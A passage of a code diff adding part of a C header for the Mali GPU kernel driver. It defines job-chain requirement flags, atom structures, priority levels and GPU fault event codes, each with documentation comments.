     531 + * if the CPU may have written to memory addressed by the job since the last job
     532 + * without this bit set was submitted.
     533 + */
     534 +#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
     535 + 
     536 +/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
     537 + *
     538 + * If this bit is set then the GPU's cache will not be cleaned and invalidated
     539 + * until a GPU job completes which does not have this bit set or a job starts
     540 + * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
     541 + * if the CPU may read from or partially overwrite memory addressed by the job
     542 + * before the next job without this bit set completes.
     543 + */
     544 +#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
     545 + 
     546 +/* Request the atom be executed on a specific job slot.
     547 + *
     548 + * When this flag is specified, it takes precedence over any existing job slot
     549 + * selection logic.
     550 + */
     551 +#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
     552 + 
     553 +/* SW-only requirement: The atom is the start of a renderpass.
     554 + *
     555 + * If this bit is set then the job chain will be soft-stopped if it causes the
     556 + * GPU to write beyond the end of the physical pages backing the tiler heap, and
     557 + * committing more memory to the heap would exceed an internal threshold. It may
     558 + * be resumed after running one of the job chains attached to an atom with
     559 + * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
     560 + * resumed multiple times until it completes without memory usage exceeding the
     561 + * threshold.
     562 + *
     563 + * Usually used with BASE_JD_REQ_T.
     564 + */
     565 +#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
     566 + 
     567 +/* SW-only requirement: The atom is the end of a renderpass.
     568 + *
     569 + * If this bit is set then the atom incorporates the CPU address of a
     570 + * base_jd_fragment object instead of the GPU address of a job chain.
     571 + *
     572 + * Which job chain is run depends upon whether the atom with the same renderpass
     573 + * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
     574 + * was soft-stopped when it exceeded an upper threshold for tiler heap memory
     575 + * usage.
     576 + *
     577 + * It also depends upon whether one of the job chains attached to the atom has
     578 + * already been run as part of the same renderpass (in which case it would have
     579 + * written unresolved multisampled and otherwise-discarded output to temporary
     580 + * buffers that need to be read back). The job chain for doing a forced read and
     581 + * forced write (from/to temporary buffers) is run as many times as necessary.
     582 + *
     583 + * Usually used with BASE_JD_REQ_FS.
     584 + */
     585 +#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
     586 + 
     587 +/* SW-only requirement: The atom needs to run on a limited core mask affinity.
     588 + *
     589 + * If this bit is set then the kbase_context.limited_core_mask will be applied
     590 + * to the affinity.
     591 + */
     592 +#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
     593 + 
     594 +/* These requirement bits are currently unused in base_jd_core_req
     595 + */
     596 +#define BASEP_JD_REQ_RESERVED \
     597 + (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \
     598 + BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \
     599 + BASE_JD_REQ_EVENT_COALESCE | \
     600 + BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \
     601 + BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \
     602 + BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \
     603 + BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \
     604 + BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK))
     605 + 
     606 +/* Mask of all bits in base_jd_core_req that control the type of the atom.
     607 + *
     608 + * This allows dependency only atoms to have flags set
     609 + */
     610 +#define BASE_JD_REQ_ATOM_TYPE \
     611 + (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \
     612 + BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE)
     613 + 
     614 +/**
     615 + * Mask of all bits in base_jd_core_req that control the type of a soft job.
     616 + */
     617 +#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f)
     618 + 
     619 +/* Returns non-zero value if core requirements passed define a soft job or
     620 + * a dependency only job.
     621 + */
     622 +#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
     623 + (((core_req) & BASE_JD_REQ_SOFT_JOB) || \
     624 + ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
     625 + 
     626 +/**
     627 + * enum kbase_jd_atom_state
     628 + *
     629 + * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
     630 + * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
     631 + * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
     632 + * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
     633 + * handed back to job dispatcher for
     634 + * dependency resolution.
     635 + * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
     636 + * back to userspace.
     637 + */
     638 +enum kbase_jd_atom_state {
     639 + KBASE_JD_ATOM_STATE_UNUSED,
     640 + KBASE_JD_ATOM_STATE_QUEUED,
     641 + KBASE_JD_ATOM_STATE_IN_JS,
     642 + KBASE_JD_ATOM_STATE_HW_COMPLETED,
     643 + KBASE_JD_ATOM_STATE_COMPLETED
     644 +};
     645 + 
     646 +/**
     647 + * typedef base_atom_id - Type big enough to store an atom number in.
     648 + */
     649 +typedef __u8 base_atom_id;
     650 + 
     651 +/**
     652 + * struct base_dependency -
     653 + *
     654 + * @atom_id: An atom number
     655 + * @dependency_type: Dependency type
     656 + */
     657 +struct base_dependency {
     658 + base_atom_id atom_id;
     659 + base_jd_dep_type dependency_type;
     660 +};
     661 + 
     662 +/**
     663 + * struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
     664 + *
     665 + * @norm_read_norm_write: Job chain for full rendering.
     666 + * GPU address of a fragment job chain to render in the
     667 + * circumstance where the tiler job chain did not exceed
     668 + * its memory usage threshold and no fragment job chain
     669 + * was previously run for the same renderpass.
     670 + * It is used no more than once per renderpass.
     671 + * @norm_read_forced_write: Job chain for starting incremental
     672 + * rendering.
     673 + * GPU address of a fragment job chain to render in
     674 + * the circumstance where the tiler job chain exceeded
     675 + * its memory usage threshold for the first time and
     676 + * no fragment job chain was previously run for the
     677 + * same renderpass.
     678 + * Writes unresolved multisampled and normally-
     679 + * discarded output to temporary buffers that must be
     680 + * read back by a subsequent forced_read job chain
     681 + * before the renderpass is complete.
     682 + * It is used no more than once per renderpass.
     683 + * @forced_read_forced_write: Job chain for continuing incremental
     684 + * rendering.
     685 + * GPU address of a fragment job chain to render in
     686 + * the circumstance where the tiler job chain
     687 + * exceeded its memory usage threshold again
     688 + * and a fragment job chain was previously run for
     689 + * the same renderpass.
     690 + * Reads unresolved multisampled and
     691 + * normally-discarded output from temporary buffers
     692 + * written by a previous forced_write job chain and
     693 + * writes the same to temporary buffers again.
     694 + * It is used as many times as required until
     695 + * rendering completes.
     696 + * @forced_read_norm_write: Job chain for ending incremental rendering.
     697 + * GPU address of a fragment job chain to render in the
     698 + * circumstance where the tiler job chain did not
     699 + * exceed its memory usage threshold this time and a
     700 + * fragment job chain was previously run for the same
     701 + * renderpass.
     702 + * Reads unresolved multisampled and normally-discarded
     703 + * output from temporary buffers written by a previous
     704 + * forced_write job chain in order to complete a
     705 + * renderpass.
     706 + * It is used no more than once per renderpass.
     707 + *
     708 + * This structure is referenced by the main atom structure if
     709 + * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
     710 + */
     711 +struct base_jd_fragment {
     712 + __u64 norm_read_norm_write;
     713 + __u64 norm_read_forced_write;
     714 + __u64 forced_read_forced_write;
     715 + __u64 forced_read_norm_write;
     716 +};
     717 + 
     718 +/**
     719 + * typedef base_jd_prio - Base Atom priority.
     720 + *
     721 + * Only certain priority levels are actually implemented, as specified by the
     722 + * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
     723 + * level that is not one of those defined below.
     724 + *
     725 + * Priority levels only affect scheduling after the atoms have had dependencies
     726 + * resolved. For example, a low priority atom that has had its dependencies
     727 + * resolved might run before a higher priority atom that has not had its
     728 + * dependencies resolved.
     729 + *
     730 + * In general, fragment atoms do not affect non-fragment atoms with
     731 + * lower priorities, and vice versa. One exception is that there is only one
     732 + * priority value for each context. So a high-priority (e.g.) fragment atom
     733 + * could increase its context priority, causing its non-fragment atoms to also
     734 + * be scheduled sooner.
     735 + *
     736 + * The atoms are scheduled as follows with respect to their priorities:
     737 + * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
     738 + * resolved, and atom 'X' has a higher priority than atom 'Y'
     739 + * * If atom 'Y' is currently running on the HW, then it is interrupted to
     740 + * allow atom 'X' to run soon after
     741 + * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
     742 + * the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
     743 + * * Any two atoms that have the same priority could run in any order with
     744 + * respect to each other. That is, there is no ordering constraint between
     745 + * atoms of the same priority.
     746 + *
     747 + * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
     748 + * scheduled between contexts. The default value, 0, will cause higher-priority
     749 + * atoms to be scheduled first, regardless of their context. The value 1 will
     750 + * use a round-robin algorithm when deciding which context's atoms to schedule
     751 + * next, so higher-priority atoms can only preempt lower priority atoms within
     752 + * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
     753 + * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
     754 + */
     755 +typedef __u8 base_jd_prio;
     756 + 
     757 +/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
     758 +#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
     759 +/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
     760 + * BASE_JD_PRIO_LOW
     761 + */
     762 +#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
     763 +/* Low atom priority. */
     764 +#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
     765 +/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
     766 + * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
     767 + */
     768 +#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
     769 + 
     770 +/* Count of the number of priority levels. This itself is not a valid
     771 + * base_jd_prio setting
     772 + */
     773 +#define BASE_JD_NR_PRIO_LEVELS 4
     774 + 
     775 +/**
     776 + * struct base_jd_atom_v2 - Node of a dependency graph used to submit a
     777 + * GPU job chain or soft-job to the kernel driver.
     778 + *
     779 + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
     780 + * is set in the base_jd_core_req) the CPU address of a
     781 + * base_jd_fragment object.
     782 + * @udata: User data.
     783 + * @extres_list: List of external resources.
     784 + * @nr_extres: Number of external resources or JIT allocations.
     785 + * @jit_id: Zero-terminated array of IDs of just-in-time memory
     786 + * allocations written to by the atom. When the atom
     787 + * completes, the value stored at the
     788 + * &struct_base_jit_alloc_info.heap_info_gpu_addr of
     789 + * each allocation is read in order to enforce an
     790 + * overall physical memory usage limit.
     791 + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
     792 + * this field; this is done in order to reduce possibility of
     793 + * improper assignment of a dependency field.
     794 + * @atom_number: Unique number to identify the atom.
     795 + * @prio: Atom priority. Refer to base_jd_prio for more details.
     796 + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
     797 + * specified.
     798 + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
     799 + * @core_req: Core requirements.
     800 + * @renderpass_id: Renderpass identifier used to associate an atom that has
     801 + * BASE_JD_REQ_START_RENDERPASS set in its core requirements
     802 + * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
     803 + * @padding: Unused. Must be zero.
     804 + *
     805 + * This structure has changed since UK 10.2 for which base_jd_core_req was a
     806 + * __u16 value.
     807 + *
     808 + * In UK 10.3 a core_req field of a __u32 type was added to the end of the
     809 + * structure, and the place in the structure previously occupied by __u16
     810 + * core_req was kept but renamed to compat_core_req.
     811 + *
     812 + * From UK 11.20 - compat_core_req is now occupied by __u8 jit_id[2].
     813 + * Compatibility with UK 10.x from UK 11.y is not handled because
     814 + * the major version increase prevents this.
     815 + *
     816 + * For UK 11.20 jit_id[2] must be initialized to zero.
     817 + */
     818 +struct base_jd_atom_v2 {
     819 + __u64 jc;
     820 + struct base_jd_udata udata;
     821 + __u64 extres_list;
     822 + __u16 nr_extres;
     823 + __u8 jit_id[2];
     824 + struct base_dependency pre_dep[2];
     825 + base_atom_id atom_number;
     826 + base_jd_prio prio;
     827 + __u8 device_nr;
     828 + __u8 jobslot;
     829 + base_jd_core_req core_req;
     830 + __u8 renderpass_id;
     831 + __u8 padding[7];
     832 +};
     833 + 
     834 +/**
     835 + * struct base_jd_atom - Same as base_jd_atom_v2, but has an extra seq_nr
     836 + * at the beginning.
     837 + *
     838 + * @seq_nr: Sequence number of logical grouping of atoms.
     839 + * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
     840 + * is set in the base_jd_core_req) the CPU address of a
     841 + * base_jd_fragment object.
     842 + * @udata: User data.
     843 + * @extres_list: List of external resources.
     844 + * @nr_extres: Number of external resources or JIT allocations.
     845 + * @jit_id: Zero-terminated array of IDs of just-in-time memory
     846 + * allocations written to by the atom. When the atom
     847 + * completes, the value stored at the
     848 + * &struct_base_jit_alloc_info.heap_info_gpu_addr of
     849 + * each allocation is read in order to enforce an
     850 + * overall physical memory usage limit.
     851 + * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
     852 + * this field; this is done in order to reduce possibility of
     853 + * improper assignment of a dependency field.
     854 + * @atom_number: Unique number to identify the atom.
     855 + * @prio: Atom priority. Refer to base_jd_prio for more details.
     856 + * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
     857 + * specified.
     858 + * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
     859 + * @core_req: Core requirements.
     860 + * @renderpass_id: Renderpass identifier used to associate an atom that has
     861 + * BASE_JD_REQ_START_RENDERPASS set in its core requirements
     862 + * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
     863 + * @padding: Unused. Must be zero.
     864 + */
     865 +typedef struct base_jd_atom {
     866 + __u64 seq_nr;
     867 + __u64 jc;
     868 + struct base_jd_udata udata;
     869 + __u64 extres_list;
     870 + __u16 nr_extres;
     871 + __u8 jit_id[2];
     872 + struct base_dependency pre_dep[2];
     873 + base_atom_id atom_number;
     874 + base_jd_prio prio;
     875 + __u8 device_nr;
     876 + __u8 jobslot;
     877 + base_jd_core_req core_req;
     878 + __u8 renderpass_id;
     879 + __u8 padding[7];
     880 +} base_jd_atom;
     881 + 
     882 +/* Job chain event code bits
     883 + * Defines the bits used to create ::base_jd_event_code
     884 + */
     885 +enum {
     886 + BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
     887 + BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
     888 + /* Event indicates success (SW events only) */
     889 + BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
     890 + BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
     891 + BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
     892 + BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
     893 + BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
     894 + /* Mask to extract the type from an event code */
     895 + BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
     896 +};
     897 + 
     898 +/**
     899 + * enum base_jd_event_code - Job chain event codes
     900 + *
     901 + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
     902 + * codes.
     903 + * Obscurely, BASE_JD_EVENT_TERMINATED
     904 + * indicates a real fault, because the
     905 + * job was hard-stopped.
     906 + * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
     907 + * 'previous job done'.
     908 + * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
     909 + * TERMINATED, DONE or JOB_CANCELLED.
     910 + * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
     911 + * was hard stopped.
     912 + * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
     913 + * complete/fail/cancel.
     914 + * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
     915 + * Obscurely, BASE_JD_EVENT_TERMINATED
     916 + * indicates a real fault,
     917 + * because the job was hard-stopped.
     918 + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
     919 + * software error status codes.
     920 + * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
     921 + * software error status codes.
     922 + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
     923 + * codes.
     924 + * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
     925 + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
     926 + * Such codes are never returned to
     927 + * user-space.
     928 + * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
      929 + * @BASE_JD_EVENT_DONE: atom has completed successfully
     930 + * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
     931 + * shall result in a failed atom
     932 + * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
     933 + * part of the memory system required to access
     934 + * job descriptors was not powered on
     935 + * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
     936 + * manager failed
     937 + * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
     938 + * manager failed
     939 + * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
     940 + * specified affinity mask does not intersect
     941 + * any available cores
     942 + * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
     943 + * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
     944 + * counter was executed.
     945 + * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
     946 + * encoding was executed.
     947 + * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
     948 + * the instruction encoding did not match the
     949 + * instruction type encoded in the program
     950 + * counter.
     951 + * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
     952 + * contained invalid combinations of operands.
     953 + * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
     954 + * to access the thread local storage section
     955 + * of another thread.
     956 + * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
     957 + * tried to do an unsupported unaligned memory
     958 + * access.
     959 + * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
     960 + * failed to complete an instruction barrier.
     961 + * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
     962 + * contains invalid combinations of data.
     963 + * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
     964 + * process a tile that is entirely outside the
     965 + * bounding box of the frame.
     966 + * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
     967 + * has been found that exceeds the virtual
     968 + * address range.
     969 + * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
     970 + * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
      971 + * the first one that reports an error will set
     972 + * and return full error information.
     973 + * Subsequent failing jobs will not update the
     974 + * error status registers, and may write an
     975 + * error status of UNKNOWN.
     976 + * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
     977 + * physical memory where the original virtual
     978 + * address is no longer available.
     979 + * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
     980 + * has detected that the same line has been
     981 + * accessed as both shareable and non-shareable
     982 + * memory from inside the GPU.
     983 + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
     984 + * entry at level 1 of the translation table.
     985 + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
     986 + * entry at level 2 of the translation table.
     987 + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
     988 + * entry at level 3 of the translation table.
     989 + * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
     990 + * entry at level 4 of the translation table.
     991 + * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
     992 + * the permission flags set in translation
     993 + * table
     994 + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
     995 + * level 0 of the translation tables.
     996 + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
     997 + * level 1 of the translation tables.
     998 + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
     999 + * level 2 of the translation tables.
     1000 + * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
     1001 + * level 3 of the translation tables.
     1002 + * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
     1003 + * translation table entry with the ACCESS_FLAG
     1004 + * bit set to zero in level 0 of the
     1005 + * page table, and the DISABLE_AF_FAULT flag
     1006 + * was not set.
     1007 + * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
     1008 + * grow memory on demand
     1009 + * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
     1010 + * dependencies failed
     1011 + * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
     1012 + * in the atom which overlaps with
     1013 + * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
     1014 + * platform doesn't support the feature specified in
     1015 + * the atom.
     1016 + * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
     1017 + * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
     1018 + * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
     1019 + * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
     1020 + * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
     1021 + * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
     1022 + * to userspace that the KBase context has been
     1023 + * destroyed and Base should stop listening for
     1024 + * further events
     1025 + * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
     1026 + * the GPU has to be retried (but it has not
     1027 + * started) due to e.g., GPU reset
     1028 + * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
     1029 + * the completion of a renderpass. This value
     1030 + * shouldn't be returned to userspace but I haven't
     1031 + * seen where it is reset back to JD_EVENT_DONE.
     1032 + *
     1033 + * HW and low-level SW events are represented by event codes.
      1034 + * The status of jobs that succeeded is also represented by
     1035 + * an event code (see @BASE_JD_EVENT_DONE).
     1036 + * Events are usually reported as part of a &struct base_jd_event.
     1037 + *
     1038 + * The event codes are encoded in the following way:
     1039 + * * 10:0 - subtype
     1040 + * * 12:11 - type
     1041 + * * 13 - SW success (only valid if the SW bit is set)
     1042 + * * 14 - SW event (HW event if not set)
     1043 + * * 15 - Kernel event (should never be seen in userspace)
     1044 + *
     1045 + * Events are split up into ranges as follows:
     1046 + * * BASE_JD_EVENT_RANGE_<description>_START
     1047 + * * BASE_JD_EVENT_RANGE_<description>_END
     1048 + *
     1049 + * code is in <description>'s range when:
     1050 + * BASE_JD_EVENT_RANGE_<description>_START <= code <
     1051 + * BASE_JD_EVENT_RANGE_<description>_END
     1052 + *
     1053 + * Ranges can be asserted for adjacency by testing that the END of the previous
     1054 + * is equal to the START of the next. This is useful for optimizing some tests
     1055 + * for range.
     1056 + *
     1057 + * A limitation is that the last member of this enum must explicitly be handled
     1058 + * (with an assert-unreachable statement) in switch statements that use
     1059 + * variables of this type. Otherwise, the compiler warns that we have not
     1060 + * handled that enum value.
     1061 + */
     1062 +enum base_jd_event_code {
     1063 + /* HW defined exceptions */
     1064 + BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
     1065 + 
     1066 + /* non-fatal exceptions */
     1067 + BASE_JD_EVENT_NOT_STARTED = 0x00,
     1068 + BASE_JD_EVENT_DONE = 0x01,
     1069 + BASE_JD_EVENT_STOPPED = 0x03,
     1070 + BASE_JD_EVENT_TERMINATED = 0x04,
     1071 + BASE_JD_EVENT_ACTIVE = 0x08,
     1072 + 
     1073 + BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
     1074 + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
     1075 + 
     1076 + /* job exceptions */
     1077 + BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
     1078 + BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
     1079 + BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
     1080 + BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
     1081 + BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
     1082 + BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
     1083 + BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
     1084 + BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
     1085 + BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
     1086 + BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
     1087 + BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
     1088 + BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
     1089 + BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
     1090 + BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
     1091 + BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
     1092 + BASE_JD_EVENT_STATE_FAULT = 0x5A,
     1093 + BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
     1094 + BASE_JD_EVENT_UNKNOWN = 0x7F,
     1095 + 
     1096 + /* GPU exceptions */
     1097 + BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
     1098 + BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
     1099 + 
     1100 + /* MMU exceptions */
     1101 + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
     1102 + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
     1103 + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
     1104 + BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
     1105 + BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
     1106 + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
     1107 + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
     1108 + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
     1109 + BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
     1110 + BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
     1111 + 
     1112 + /* SW defined exceptions */
     1113 + BASE_JD_EVENT_MEM_GROWTH_FAILED =
     1114 + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000,
     1115 + BASE_JD_EVENT_TIMED_OUT =
     1116 + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001,
     1117 + BASE_JD_EVENT_JOB_CANCELLED =
     1118 + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002,
     1119 + BASE_JD_EVENT_JOB_INVALID =
     1120 + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003,
     1121 + BASE_JD_EVENT_PM_EVENT =
     1122 + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004,
     1123 + 
     1124 + BASE_JD_EVENT_BAG_INVALID =
     1125 + BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003,
     1126 + 
     1127 + BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT |
     1128 + BASE_JD_SW_EVENT_RESERVED | 0x3FF,
     1129 + 
     1130 + BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT |
     1131 + BASE_JD_SW_EVENT_SUCCESS | 0x000,
     1132 + 
     1133 + BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT |
     1134 + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000,
     1135 + BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS |
     1136 + BASE_JD_SW_EVENT_BAG | 0x000,
     1137 + BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT |
     1138 + BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000,
     1139 + 
     1140 + BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT |
